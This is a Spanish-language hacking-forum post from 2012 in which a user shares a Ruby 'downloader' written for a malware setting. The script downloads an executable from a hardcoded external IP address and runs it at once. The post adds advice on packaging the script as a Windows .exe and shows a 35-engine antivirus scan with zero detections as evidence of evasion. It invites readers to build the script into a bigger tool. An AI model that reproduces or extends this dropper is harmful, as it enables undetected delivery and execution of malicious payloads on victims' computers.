Tu comunidad de Seguridad Informatica

Para ver Todo el contenido del foro es necesario estar Registrado!
Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules
Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post.
Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]

No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]

avatar
Usuario
Usuario

Ver perfil de usuario
el Mar Oct 16, 2012 5:21 pm
Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.

Código :

Código:
require 'Win32API'
require 'open-uri'

=begin
----------------------------------
| Coded by Sanko              |
| Simple Ruby Downloader |
----------------------------------
=end

archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar

archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close

aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
    system 'sk.exe'
end

Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :

[Tienes que estar registrado y conectado para ver este vínculo]

Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :

[Info]
Fecha del reporte: Wed, 12 Sep 2012 22:49:23 +0000
Archivo: downloader.exe
Tamaño: 5099284 bytes
MD5: 49e985612dcf90085bb9a61093abddc8
Estado: Limpio
Detecciones: 0 de 35 (0%)
Reporte: [Tienes que estar registrado y conectado para ver este vínculo]
Reporte generado por [Tienes que estar registrado y conectado para ver este vínculo]

[Detecciones]
A-Squared - Clean
AVG Free - Clean
Ad-Aware - Clean
AntiVir (Avira) - Clean
ArcaVir - Clean
Avast 5 - Clean
BitDefender - Clean
BullGuard - Clean
COMODO Internet Security - Clean
Clam Antivirus - Clean
Dr.Web - Clean
ESET NOD32 - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Antivirus - Clean
MS Security Essentials - Clean
McAfee - Clean
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Clean
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
VIPRE - Clean
Vexira Antivirus - Clean
VirusBuster Internet Security - Clean
Zoner AntiVirus - Clean
eTrust-Vet - Clean

Gracias Elsuc por escanearme el archivo.

Y aqui una muestra de como se comporta :

Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.